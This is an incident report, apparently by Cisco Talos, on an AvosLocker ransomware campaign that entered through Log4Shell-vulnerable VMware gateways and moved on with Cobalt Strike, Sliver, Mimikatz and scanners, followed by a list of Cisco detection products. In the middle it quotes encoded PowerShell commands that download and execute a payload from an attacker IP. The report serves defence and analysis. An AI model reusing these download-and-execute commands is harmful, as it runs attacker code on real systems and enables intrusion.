By Flavio Costa,
- In a recent customer engagement, we observed a month-long AvosLocker campaign.
- The attackers utilized several different tools, including Cobalt Strike, Sliver and multiple commercial network scanners.
- The initial ingress point in this incident was a pair of VMWare Horizon Unified Access Gateways that were vulnerable to Log4Shell. While Cisco products were deployed on the network, the appliances were never configured, allowing the attacker to gain access to internal servers and maintain a foothold.
- During the time the attacker was active in the network, several security events were detected by the security products but were not reviewed by the security team, which could have prevented the ransomware activity.
Threat Actor Profile: Avos
Avos is a ransomware group first identified in 2021 initially targeting Windows machines. More recently, a new ransomware variant of AvosLocker, named after the group, is also targeting Linux environments. Well-funded and financially motivated, Avos has been active since June 2021 and follows the ransomware-as-a-service (RaaS) model, an affiliate program to recruit potential partners. The announcement of the program includes information about the features of the ransomware and lets affiliates know that AvosLocker operators will handle negotiation and extortion practices. The user "Avos" has also been observed trying to recruit individuals on the Russian forum XSS.
Typically, Avos uses spam email campaigns as an initial infection vector to deliver ransomware. In this particular incident, however, the initial vector was an ESXi server exposed on the internet over VMWare Horizon Unified Access Gateways (UAG), which was vulnerable to the Log4Shell vulnerability. The customer notified Talos on March 7 2022, but noticed activity related to the ransomware attack as far back as Feb. 7, 2022.
Several vulnerabilities associated with Log4j, listed below, were found on this customer's UAG:
These vulnerabilities can potentially allow remote code execution on Unified Access Gateways by a low-privilege non-root user named "gateway". Beyond that, the inner-transit firewalls that could control or limit the access to the internal infrastructure were not configured, hence, the attackers used it as the initial access to establish a foothold on the customer's network, granting access to their internal servers.
The victim in this case used Cisco Secure Endpoint (formerly known as Advanced Malware Protection) as its EPP/EDR solution on most endpoints, from workstations to servers, which allowed Talos to collect important information about the entire attack lifecycle.
During the initial phases of the attack the threat actor made numerous steps to gain a foothold on the victim network. Several other payloads and malicious tools were observed on endpoints, along with the utilization of living-off-the-land binaries (LoLBins).
Talos observed the attackers using the WMI Provider Host (wmiprvse.exe) on a Windows Server that was the initial point of entry to run an encoded PowerShell script using the DownloadString method at 01:41 UTC on Feb. 11.
Three days later, on Feb. 14, a retrospective detection was triggered for the RuntimeBrokerService.exe executable in "C:\Windows\System32\temp\" for creating a file called "watcher.exe." These particular files may be artifacts from a separate threat actor, as these files appear to be related to a cryptocurrency miner rather than AvosLocker. It is not uncommon for a miner to be deployed alongside ransomware in an attempt to passively increase revenue. However, there is significant evidence that multiple threat actors had compromised this network, as DarkComet samples unrelated to this campaign were also discovered.
Approximately four weeks later on March 4, another encoded PowerShell command was executed, shown below, again utilizing the DownloadString method.
powershell.exe -exec bypass -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHKACWB0AGUAbQAuAEAZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKAKQAUAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAAA6ACAALwA0ADUALgAxADMANgAuADIAMwAwACAWAADEAOgA0ADAAMAAwACAAyADMANABSADIAMWAnACkAOwA=
iex (New-Object SystemNetWebClient)DownloadString('http://45[.]136[.]230[.]191:4000/D234R23');
Two days later on March 6, the attacker ran more PowerShell scripts to download and execute a Sliver payload labeled "vmware_kb.exe". As seen in their blog post regarding Sliver, Team Cymru has observed the deployment of this executable in a similar campaign. In the following days, several PowerShell scripts downloaded additional files, including Mimikatz and a .zip archive called "IIS Temporary Compressed Files.zip" containing Cobalt Strike beacons and a port scanner labeled "scanner.exe." This port scanner is a commercially available product which Avos is known for deploying called SoftPerfect Network Scanner. Later that same day, the attackers utilized WMIC to modify administrative settings on both a local and a remote host, behavior that is indicative of the first stages of lateral movement.
Another PowerShell command observed on March 6, shown below, is an artifact from a Cobalt Strike beacon executing its powershell-import function:
powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAAAuAFcAZQBiAGMAbAbABpAGUAbgB0ACkALgBEAG8A dwBuAGwAbwAgAUQAUWB0AHIAAQBuAGcAKAAAGgAdAB0AAAOgAvAC8AMQAyADcALgAwAC4AMAAAAAAAAGAzADIANAA2AdcALwAnACkA
IEX (New-Object NetWebclient)DownloadString('http://127.0.0.1:32467/')
On March 8, another instance of the SoftPerfect Network Scanner was transferred via AnyDesk to another server in the network. Later that day, the AvosLocker payload was finally delivered, using the victim's company name as the filename.
To proliferate the ransomware and other tools across the target network, the attackers used PDQ Deploy, a legitimate software deployment tool. Once the ransomware was delivered, the victims files were then encrypted and a ransom note was displayed, shown below.
This incident showcases the importance of ensuring that security appliances are properly set up and configured, updates and patches are applied and the security team is always monitoring alerts. While the attack techniques used in this campaign are not novel, they are still effective if the proper precautions are not in place.
With a highly motivated threat actor like Avos actively recruiting affiliates, these attacks are likely to proliferate in the future. Such attackers are constantly hunting for vulnerable networks and can infiltrate them with relative ease, sometimes by multiple threat actors, as seen in this particular case. A layered defense model is therefore imperative to detect, contain and protect against post-exploitation activity. While static and network-based detection is important, it should be complemented with properly configured system behavior analysis and endpoint protections.
Ways our customers can detect and block this threat are listed below.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here and here.
Cobalt Strike artifacts
IIS Temporary Compressed Files.zip